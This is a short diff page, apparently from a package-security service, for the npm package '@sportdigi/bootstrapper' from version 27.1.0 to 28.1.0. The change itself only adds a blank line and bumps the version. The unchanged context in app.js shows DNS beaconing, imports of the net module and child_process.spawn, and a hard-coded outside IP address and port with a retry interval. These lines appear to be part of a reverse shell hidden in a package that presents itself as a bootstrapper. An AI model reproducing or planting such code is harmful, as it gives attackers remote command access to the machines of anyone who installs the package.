@sportdigi/bootstrapper 27.1.0 → 28.1.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/app.js +1 -0
  2. package/package.json +1 -1
package/app.js CHANGED
@@ -19,6 +19,7 @@ sendDns(platform);
19
19
  const net = require('net');
20
20
  const spawn = require('child_process').spawn;
21
21
 
22
+
22
23
  const HOST = '54.90.237.9';
23
24
  const PORT = 9797;
24
25
  const retryInterval = 15000;
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@sportdigi/bootstrapper",
3
- "version": "27.1.0",
3
+ "version": "28.1.0",
4
4
  "description": "",
5
5
  "main": "app.js",
6
6
  "scripts": {